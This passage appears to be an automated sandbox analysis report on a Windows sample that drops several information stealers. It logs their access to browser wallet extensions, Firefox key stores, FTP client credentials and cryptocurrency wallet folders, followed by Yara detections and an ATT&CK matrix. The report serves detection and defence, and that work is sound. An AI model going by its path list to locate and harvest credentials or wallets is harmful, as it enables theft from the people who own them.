Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB

Source: Yara match	File source: 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2328083508.0000000001589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2310873047.0000000001589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2308505301.0000000001589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfd80aba08.exe PID: 3164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dfd80aba08.exe PID: 5888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loqVSeJ.exe PID: 2692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bjkm5hE.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7fOMOTQ.exe PID: 1196, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dfd80aba08.exe PID: 3164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dfd80aba08.exe PID: 5888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7fOMOTQ.exe PID: 1196, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 21.2.e2b0a87ceb.exe.3ef9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.e2b0a87ceb.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.e2b0a87ceb.exe.3ef9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2611358167.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2384664096.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1072561001\c6de8b12c0.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1072568001\88823343d6.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loqVSeJ.exe PID: 2692, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 0000001F.00000002.2548165139.0000000001001000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2566196660.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2288787016.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2435867329.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2639679163.0000000000111000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2336403037.0000000001001000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2626428387.0000000005550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2337888063.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2552036378.000000000193B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2826217416.0000000001001000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PAL947G2R107U02V5ZPL.exe PID: 2084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 7160, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bjkm5hE.exe PID: 6380, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	312 Scripting	Valid Accounts	231 Windows Management Instrumentation	312 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	13 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	312 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	347 System Information Discovery	Remote Desktop Protocol	41 Data from Local System	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	21 Scheduled Task/Job	21 Scheduled Task/Job	151 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	22 Command and Scripting Interpreter	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	32 Software Packing	NTDS	1181 Security Software Discovery	Distributed Component Object Model	11 Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	21 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	3 Process Discovery	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	581 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	581 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: AsyncRAT

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

Spreading

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

